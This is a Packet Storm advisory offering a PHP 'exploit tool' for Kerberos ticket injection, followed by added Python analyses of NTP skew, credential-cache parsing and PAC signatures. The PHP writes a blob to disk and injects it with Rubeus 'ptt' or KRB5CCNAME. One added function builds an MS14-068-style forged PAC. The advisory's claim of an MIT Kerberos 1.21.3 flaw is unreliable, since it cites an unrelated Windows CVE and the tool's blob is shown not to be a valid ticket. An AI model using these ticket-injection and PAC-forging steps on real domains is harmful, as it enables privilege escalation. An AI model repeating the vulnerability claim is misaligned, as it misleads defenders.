Kerberos 5-1.21.3 Privilege Escalation / Ticket Injection

Published: 07 Mar 2025
Reported by: indoushka
Type: packetstorm
Source: packetstorm.news

Kerberos V5-1.21.3 has a vulnerability that allows privilege escalation and ticket injection attacks.

Code
=============================================================================================================================================
| # Title     : Kerberos V5-1.21.3 Privilege Escalation & Ticket Injection Tool Vulnerability                                               |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
| # Vendor    : https://web.mit.edu/kerberos/                                                                                               |
=============================================================================================================================================
    
POC :

[+] Dorking in Google or another search engine.

[+] Code description: the tool is written in PHP and runs on Windows and Linux. It checks whether the target's NTP clock is out of sync, builds a PAC-like blob from the supplied domain and SID, and tries to import that blob as a Kerberos ticket (Rubeus "ptt" on Windows, a KRB5CCNAME credential cache on Linux).

   (Related : https://packetstorm.news/files/id/180752/ ; linked CVE: CVE-2014-6324, the Windows KDC PAC signature validation flaw fixed by MS14-068.)

[+] Save the code as poc.php.

[+] Set target : edit the $target_ip, $domain_name and $user_sid assignments under "// Example Usage" at the end of the file.

[+] PayLoad :

<?php
// Kerberos Exploit Tool
// Supports Windows & Linux
// Features: NTP desync check, PAC blob generation, Ticket Injection
// Author: Indoushka

// Detect the host OS. PHP_OS_FAMILY (PHP >= 7.2) replaces stripos(PHP_OS, 'WIN'),
// which also matches "Darwin" and would treat macOS as Windows.
function check_os(): string {
    switch (PHP_OS_FAMILY) {
        case 'Windows':
            return "Windows";
        case 'Linux':
            return "Linux";
        default:
            die("[!] Unsupported OS\n");
    }
}

// Run a command and return [exit code, combined stdout/stderr].
// exec() is used instead of shell_exec() so failure is judged by exit status,
// not by whether the command happened to print something.
function run_cmd(string $cmd): array {
    $lines = [];
    $rc = 1;
    exec($cmd . " 2>&1", $lines, $rc);
    return [$rc, implode("\n", $lines)];
}

// NTP desync check.
// Note: "ntpq -p" prints a peer table (remote, refid, st, t, when, poll, reach,
// delay, offset, jitter) and never the word "unsynchronized"; that wording comes
// from ntpstat ("unsynchronised") or timedatectl. The keyword test is kept as the
// author's heuristic and accepts both spellings; the offset column (milliseconds)
// is what actually has to be compared with the KDC's clock skew limit.
function check_ntp_sync(string $target): void {
    [$rc, $output] = run_cmd("ntpq -p " . escapeshellarg($target));
    if ($rc !== 0) {
        echo "[!] Failed to execute NTP query (exit $rc): $output\n";
        return;
    }
    if (strpos(strtolower($output), "unsynchroni") !== false) {
        echo "[*] Target NTP is desynchronized - Possible Exploit!\n";
    } else {
        echo "[-] Target is synchronized - Harder to exploit.\n";
    }
}

// Kerberos Ticket Injection
function inject_ticket(string $ticket_data): bool {
    $os = check_os();
    if ($os == "Windows") {
        // Rubeus "ptt" imports a .kirbi (KRB-CRED) into the current logon session.
        // Rubeus.exe must be on PATH or in the working directory.
        $ticket_path = "C:\\Windows\\Temp\\ticket.kirbi";
        file_put_contents($ticket_path, $ticket_data);
        [$rc, $result] = run_cmd("rubeus.exe ptt /ticket:" . escapeshellarg($ticket_path));
    } else {
        // On Linux, "injection" means pointing KRB5CCNAME at a credential cache file.
        // putenv() only affects this PHP process and its children; a shell that should
        // use the ticket needs "export KRB5CCNAME=/tmp/krb5cc_0" itself.
        // klist only parses and lists the cache; it exits non-zero unless the file is a
        // real MIT/Heimdal ccache, so here it doubles as a validity check.
        $ticket_path = "/tmp/krb5cc_0";
        putenv("KRB5CCNAME=" . $ticket_path);
        file_put_contents($ticket_path, $ticket_data);
        chmod($ticket_path, 0600);
        [$rc, $result] = run_cmd("klist -c " . escapeshellarg($ticket_path));
    }
    if ($rc !== 0) {
        echo "[!] Ticket injection failed:\n$result\n";
        return false;
    }
    echo "[+] Ticket successfully injected.\n$result\n";
    return true;
}

// Generate Fake PAC
// Produces a 4-byte little-endian marker (0x00020000) followed by the raw domain
// and SID strings. This is a placeholder blob, not a PACTYPE structure as defined
// in MS-PAC (cBuffers, Version, PAC_INFO_BUFFER array, server and KDC checksums),
// and it is not a format that Rubeus or klist parses as a ticket.
function generate_pac(string $user_sid, string $domain): string {
    return pack("V", 0x00020000) . $domain . $user_sid;
}

// Main Exploit Function
// $username and $password are accepted but not used: no AS-REQ is sent and no
// real ticket is obtained before the injection step.
function kerberos_exploit(string $target, string $username, string $password, string $domain, string $user_sid): void {
    echo "[*] Targeting $target in domain $domain\n";
    check_ntp_sync($target);
    $pac = generate_pac($user_sid, $domain);
    if (inject_ticket($pac)) {
        echo "[+] Exploit completed. Check your privileges!\n";
    } else {
        echo "[-] Exploit did not complete.\n";
    }
}

// Example Usage
$target_ip = "192.168.1.100";
$user = "victim";
$pwd = "password123";
$domain_name = "DEMO.LOCAL";
$user_sid = "S-1-5-21-1234567890-1234567890-1234567890-1000";
kerberos_exploit($target_ip, $user, $pwd, $domain_name, $user_sid);
?>
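The tool's NTP step searches `ntpq -p` output for the word "unsynchronized", which that command does not print. The following is an added example, not part of the original advisory or of indoushka's tool: it reads the peer table `ntpq -p` actually prints and compares the offset of the peer ntpd is following against the clock skew Kerberos tolerates (MIT krb5's `[libdefaults] clockskew` defaults to 300 seconds; a larger difference yields KRB_AP_ERR_SKEW). The billboards are constructed sample output; `dc01.demo.local` and the other peer names are placeholders.

```python
# Added example: compare the ntpq peer table with the Kerberos clock skew limit.
KRB5_DEFAULT_CLOCKSKEW_S = 300.0    # MIT krb5 [libdefaults] clockskew default, in seconds


def system_peer_offset_ms(billboard: str):
    """Offset in ms of the peer ntpd is actually following (tally '*' or 'o'), else None."""
    for line in billboard.splitlines()[2:]:          # skip the column header and the ==== rule
        if not line or line[0] not in "*o":
            continue
        fields = line[1:].split()
        # columns: remote refid st t when poll reach delay offset jitter
        if len(fields) >= 10:
            try:
                return float(fields[8])
            except ValueError:
                return None
    return None


def assess_clock_skew(billboard: str, clockskew_s: float = KRB5_DEFAULT_CLOCKSKEW_S):
    """Return (verdict, offset_seconds): 'within-skew', 'exceeds-skew', or 'unknown' with None.

    'unknown' covers a failed query ("***Request timed out") and a table with no
    selected peer; neither case contains the word "unsynchronized".
    """
    offset_ms = system_peer_offset_ms(billboard)
    if offset_ms is None:
        return "unknown", None
    offset_s = offset_ms / 1000.0
    return ("exceeds-skew" if abs(offset_s) > clockskew_s else "within-skew"), offset_s


# Constructed sample billboards (placeholder peer names and numbers).
SYNCED = """\
     remote           refid      st t when poll reach   delay   offset  jitter
==============================================================================
*dc01.demo.local 192.168.1.1      3 u   42   64  377    0.412   -0.731   0.118
+ntp2.demo.local .GPS.            1 u   17   64  377    1.204    0.502   0.511
 ntp3.demo.local .INIT.          16 u    -   64    0    0.000    0.000   0.000
"""
SKEWED = SYNCED.replace("-0.731", "312450.2")    # system peer 312 s off: beyond the 5-minute default
NO_PEER = SYNCED.replace("*dc01", " dc01")       # nothing selected: ntpd is not synchronized
FAILED = "localhost: timed out, nothing received\n***Request timed out\n"

if __name__ == "__main__":
    for name, bb in (("synced", SYNCED), ("skewed", SKEWED), ("no peer", NO_PEER), ("failed", FAILED)):
        print(name, assess_clock_skew(bb))
```

The verdict only says whether a ticket presented right now would be accepted; it says nothing about whether the KDC itself can be abused, which is a separate question from clock drift.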
    
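On Linux the tool writes its blob to /tmp/krb5cc_0 and points KRB5CCNAME at it, so the file has to be a credential cache for klist or any GSSAPI client to use it. The following is an added example, not part of the original advisory or of indoushka's tool: a parser for the MIT krb5 ccache file format (versions 1 to 4, all big-endian) and a check of what klist would make of a file. `SAMPLE_CCACHE` is constructed here from placeholder values (realm DEMO.LOCAL, user victim, a 32-byte zero session key, a dummy ticket blob); `PHP_TOOL_BLOB` reproduces the bytes the tool's `generate_pac()` returns.

```python
# Added example: parse MIT krb5 credential caches and test what klist would accept.
import struct

NT_PRINCIPAL, NT_SRV_INST = 1, 2          # krb5 principal name types
ENCTYPE_AES256_CTS_HMAC_SHA1_96 = 18


# --- encoder, used only to construct the sample ---------------------------------
def _data(b: bytes) -> bytes:
    return struct.pack(">I", len(b)) + b


def _principal(realm: str, comps: list, name_type: int) -> bytes:
    out = struct.pack(">II", name_type, len(comps)) + _data(realm.encode())
    return out + b"".join(_data(c.encode()) for c in comps)


def build_ccache_v4(realm: str, client: str, service: str, ticket: bytes, endtime: int) -> bytes:
    """Version-4 ccache (0x05 0x04) holding one credential."""
    header = struct.pack(">HHii", 1, 8, 0, 0)                    # tag 1 DeltaTime, len 8, offsets 0/0
    out = b"\x05\x04" + struct.pack(">H", len(header)) + header
    out += _principal(realm, [client], NT_PRINCIPAL)             # default principal
    out += _principal(realm, [client], NT_PRINCIPAL)             # credential: client
    out += _principal(realm, service.split("/"), NT_SRV_INST)    # credential: server
    out += struct.pack(">H", ENCTYPE_AES256_CTS_HMAC_SHA1_96) + _data(b"\x00" * 32)  # keyblock
    out += struct.pack(">IIII", endtime - 36000, endtime - 36000, endtime, endtime)  # auth/start/end/renew
    out += b"\x00" + struct.pack(">I", 0x40E10000)               # is_skey, ticket flags
    out += struct.pack(">II", 0, 0)                              # no addresses, no authdata
    return out + _data(ticket) + _data(b"")                      # ticket, second_ticket


# --- parser -----------------------------------------------------------------------
class CcacheError(ValueError):
    pass


class _Reader:
    def __init__(self, buf: bytes, pos: int = 0):
        self.buf, self.pos = buf, pos

    def take(self, n: int) -> bytes:
        if self.pos + n > len(self.buf):
            raise CcacheError("truncated ccache")
        chunk, self.pos = self.buf[self.pos:self.pos + n], self.pos + n
        return chunk

    def u8(self): return self.take(1)[0]
    def u16(self): return struct.unpack(">H", self.take(2))[0]
    def u32(self): return struct.unpack(">I", self.take(4))[0]
    def data(self): return self.take(self.u32())

    def principal(self, version: int) -> str:
        name_type = self.u32() if version >= 2 else NT_PRINCIPAL  # v1 has no name type field
        n = self.u32() - (1 if version == 1 else 0)                # v1 counts the realm as a component
        realm = self.data().decode()
        return "/".join(self.data().decode() for _ in range(n)) + "@" + realm


def parse_ccache(buf: bytes) -> dict:
    """Parse ccache versions 1-4; raise CcacheError where klist reports 'Bad format'."""
    if len(buf) < 2 or buf[0] != 0x05 or buf[1] not in (1, 2, 3, 4):
        raise CcacheError("not a krb5 ccache: expected 0x05 0x01..0x04, got %s" % buf[:2].hex())
    version, r = buf[1], _Reader(buf, 2)
    if version == 4:                                             # tagged header (DeltaTime, ...)
        end = r.pos + 2 + struct.unpack(">H", buf[2:4])[0]
        r.pos = 4
        while r.pos < end:
            r.u16(); r.take(r.u16())                             # tag, length, value
    default = r.principal(version)
    creds = []
    while r.pos < len(buf):
        cred = {"client": r.principal(version), "server": r.principal(version)}
        cred["enctype"] = r.u16()
        if version == 3:
            r.u16()                                              # v3 repeats the enctype
        r.data()                                                 # session key
        times = [r.u32() for _ in range(4)]                      # authtime, starttime, endtime, renew_till
        cred["endtime"] = times[2]
        r.u8(); cred["flags"] = r.u32()                          # is_skey, ticket flags
        for _ in range(r.u32()): r.u16(); r.data()               # addresses
        for _ in range(r.u32()): r.u16(); r.data()               # authdata
        cred["ticket_len"] = len(r.data()); r.data()             # ticket, second_ticket
        creds.append(cred)
    return {"version": version, "default_principal": default, "credentials": creds}


def check_blob(blob: bytes):
    """What 'klist -c <file>' would make of the bytes: (True, summary) or (False, reason)."""
    try:
        cc = parse_ccache(blob)
    except CcacheError as e:
        return False, str(e)
    return True, "%s, %d credential(s)" % (cc["default_principal"], len(cc["credentials"]))


SAMPLE_CCACHE = build_ccache_v4("DEMO.LOCAL", "victim", "krbtgt/DEMO.LOCAL",
                                b"\x61\x82\x01\x00" + b"\x00" * 16, 1741305600)
# Same bytes the tool's generate_pac() writes: pack("V", 0x00020000) . $domain . $user_sid
PHP_TOOL_BLOB = struct.pack("<I", 0x00020000) + b"DEMO.LOCAL" + b"S-1-5-21-1234567890-1234567890-1234567890-1000"

if __name__ == "__main__":
    print(check_blob(SAMPLE_CCACHE))
    print(check_blob(PHP_TOOL_BLOB))
```

Because the tool's blob starts with 0x00 0x00 rather than the 0x05 version marker, klist rejects it before reading a principal; a success message from the tool on Linux can therefore only come from misreading klist's exit status, which is why the PHP above checks the return code.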
    
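The advisory links CVE-2014-6324 (MS14-068), and its `generate_pac()` returns a marker plus two strings. The following is an added example, not part of the original advisory or of indoushka's tool: the PAC layout from MS-PAC (PACTYPE header, PAC_INFO_BUFFER array, two PAC_SIGNATURE_DATA buffers) with the RFC 4757 HMAC-MD5 checksum that RC4 keys use, and the SignatureType whitelist whose absence was MS14-068: a KDC that accepts an unkeyed type such as RSA_MD5 lets anyone "sign" a PAC without a key. Keys, the logon-info bytes and the forged PAC are constructed placeholders; AES checksum verification is left unimplemented.

```python
# Added example: MS-PAC structure, RC4-HMAC PAC signatures, and the MS14-068 signature-type check.
import hashlib
import hmac
import struct

PAC_LOGON_INFO, PAC_SERVER_CHECKSUM, PAC_PRIVSVR_CHECKSUM = 1, 6, 7   # PAC_INFO_BUFFER ulType values
KERB_CHECKSUM_HMAC_MD5 = 0xFFFFFF76                                   # -138, keyed RC4 checksum
HMAC_SHA1_96_AES128, HMAC_SHA1_96_AES256 = 15, 16
KEYED_SIGNATURE_TYPES = {KERB_CHECKSUM_HMAC_MD5, HMAC_SHA1_96_AES128, HMAC_SHA1_96_AES256}
RSA_MD5 = 7                                # unkeyed; the type the MS14-068 forgery relied on
KERB_NON_KERB_CKSUM_SALT = 17              # key usage for PAC checksums (MS-PAC 2.8.1)
SIG_LEN = 16                               # HMAC-MD5 signature length


def rc4_hmac_md5_checksum(key: bytes, data: bytes, usage: int = KERB_NON_KERB_CKSUM_SALT) -> bytes:
    """RFC 4757 section 4: Ksign = HMAC(K, 'signaturekey\\0'); result = HMAC(Ksign, MD5(T || data))."""
    ksign = hmac.new(key, b"signaturekey\x00", hashlib.md5).digest()
    return hmac.new(ksign, hashlib.md5(struct.pack("<I", usage) + data).digest(), hashlib.md5).digest()


def _align8(n: int) -> int:
    return (n + 7) & ~7


def build_pac(buffers) -> bytes:
    """PACTYPE {cBuffers, Version=0, PAC_INFO_BUFFER[]} followed by 8-byte-aligned buffer data."""
    header = struct.pack("<II", len(buffers), 0)
    offset = _align8(8 + 16 * len(buffers))
    body = b""
    for ul_type, data in buffers:
        header += struct.pack("<IIQ", ul_type, len(data), offset)     # ulType, cbBufferSize, Offset
        data += b"\x00" * (_align8(len(data)) - len(data))
        body, offset = body + data, offset + len(data)
    return header + b"\x00" * (_align8(len(header)) - len(header)) + body


def parse_pac(pac: bytes) -> dict:
    """Map ulType -> (offset, size); raise ValueError if the header or an entry does not fit."""
    if len(pac) < 8:
        raise ValueError("too short for a PACTYPE header")
    c_buffers, version = struct.unpack_from("<II", pac, 0)
    if version != 0 or 8 + 16 * c_buffers > len(pac):
        raise ValueError("bad PACTYPE: cBuffers=%d version=%d" % (c_buffers, version))
    entries = {}
    for i in range(c_buffers):
        ul_type, size, offset = struct.unpack_from("<IIQ", pac, 8 + 16 * i)
        if offset + size > len(pac):
            raise ValueError("PAC_INFO_BUFFER %d points outside the PAC" % ul_type)
        entries[ul_type] = (offset, size)
    return entries


def _zeroed(pac: bytes, entries: dict) -> bytes:
    """Copy with both Signature fields zeroed: the input MS-PAC 2.8 defines for the checksums."""
    buf = bytearray(pac)
    for t in (PAC_SERVER_CHECKSUM, PAC_PRIVSVR_CHECKSUM):
        off = entries[t][0]
        buf[off + 4:off + 4 + SIG_LEN] = b"\x00" * SIG_LEN           # keep SignatureType, zero Signature
    return bytes(buf)


def sign_pac(pac: bytes, server_key: bytes, kdc_key: bytes) -> bytes:
    """Server checksum over the zeroed PAC; KDC checksum over the server checksum bytes."""
    entries = parse_pac(pac)
    buf = bytearray(_zeroed(pac, entries))
    s_off, k_off = entries[PAC_SERVER_CHECKSUM][0], entries[PAC_PRIVSVR_CHECKSUM][0]
    server_sig = rc4_hmac_md5_checksum(server_key, bytes(buf))
    buf[s_off + 4:s_off + 4 + SIG_LEN] = server_sig
    buf[k_off + 4:k_off + 4 + SIG_LEN] = rc4_hmac_md5_checksum(kdc_key, server_sig)
    return bytes(buf)


def validate_pac(pac: bytes, server_key: bytes, kdc_key: bytes):
    """(ok, reason). The SignatureType whitelist runs before any digest is compared."""
    try:
        entries = parse_pac(pac)
    except ValueError as e:
        return False, str(e)
    for t in (PAC_SERVER_CHECKSUM, PAC_PRIVSVR_CHECKSUM):
        if t not in entries:
            return False, "missing signature buffer ulType=%d" % t
        sig_type = struct.unpack_from("<I", pac, entries[t][0])[0]
        if sig_type not in KEYED_SIGNATURE_TYPES:
            return False, "unkeyed/unsupported SignatureType 0x%08x in ulType=%d" % (sig_type, t)
        if sig_type != KERB_CHECKSUM_HMAC_MD5:
            return False, "only KERB_CHECKSUM_HMAC_MD5 is implemented in this example"
    s_off, k_off = entries[PAC_SERVER_CHECKSUM][0], entries[PAC_PRIVSVR_CHECKSUM][0]
    server_sig = pac[s_off + 4:s_off + 4 + SIG_LEN]
    if not hmac.compare_digest(server_sig, rc4_hmac_md5_checksum(server_key, _zeroed(pac, entries))):
        return False, "server checksum mismatch"
    if not hmac.compare_digest(pac[k_off + 4:k_off + 4 + SIG_LEN], rc4_hmac_md5_checksum(kdc_key, server_sig)):
        return False, "KDC checksum mismatch"
    return True, "ok"


# ---- constructed sample data (placeholders, not real keys) --------------------------
SERVER_KEY = hashlib.md5(b"placeholder service key").digest()   # stands in for the service's RC4 key
KDC_KEY = hashlib.md5(b"placeholder krbtgt key").digest()       # stands in for the krbtgt RC4 key
LOGON_INFO = b"\x00" * 64   # placeholder; a real PAC carries NDR-encoded KERB_VALIDATION_INFO here


def _empty_sig(sig_type: int) -> bytes:
    return struct.pack("<I", sig_type) + b"\x00" * SIG_LEN


def signed_pac() -> bytes:
    unsigned = build_pac([(PAC_LOGON_INFO, LOGON_INFO),
                          (PAC_SERVER_CHECKSUM, _empty_sig(KERB_CHECKSUM_HMAC_MD5)),
                          (PAC_PRIVSVR_CHECKSUM, _empty_sig(KERB_CHECKSUM_HMAC_MD5))])
    return sign_pac(unsigned, SERVER_KEY, KDC_KEY)


def forged_pac_ms14_068() -> bytes:
    """The MS14-068 shape: RSA_MD5 SignatureType with plain MD5 digests, needing no key at all."""
    pac = build_pac([(PAC_LOGON_INFO, LOGON_INFO),
                     (PAC_SERVER_CHECKSUM, _empty_sig(RSA_MD5)),
                     (PAC_PRIVSVR_CHECKSUM, _empty_sig(RSA_MD5))])
    entries, buf = parse_pac(pac), bytearray(pac)
    s_off, k_off = entries[PAC_SERVER_CHECKSUM][0], entries[PAC_PRIVSVR_CHECKSUM][0]
    server_sig = hashlib.md5(pac).digest()
    buf[s_off + 4:s_off + 4 + SIG_LEN] = server_sig
    buf[k_off + 4:k_off + 4 + SIG_LEN] = hashlib.md5(server_sig).digest()
    return bytes(buf)


# Same bytes the tool's generate_pac() writes; read as PACTYPE, the first word claims 131072 buffers.
PHP_TOOL_BLOB = struct.pack("<I", 0x00020000) + b"DEMO.LOCAL" + b"S-1-5-21-1234567890-1234567890-1234567890-1000"
```

A patched KDC fails the forged PAC on the type check alone, before it looks at any digest; the tool's blob never gets that far, because a 4-byte cBuffers of 0x00020000 asks for a header larger than the file.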
    
    
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================


Vulners AI Score: 7.9 (High risk)
CVSS 2: 9
CVSS 3.1: 8.8
EPSS: 0.9035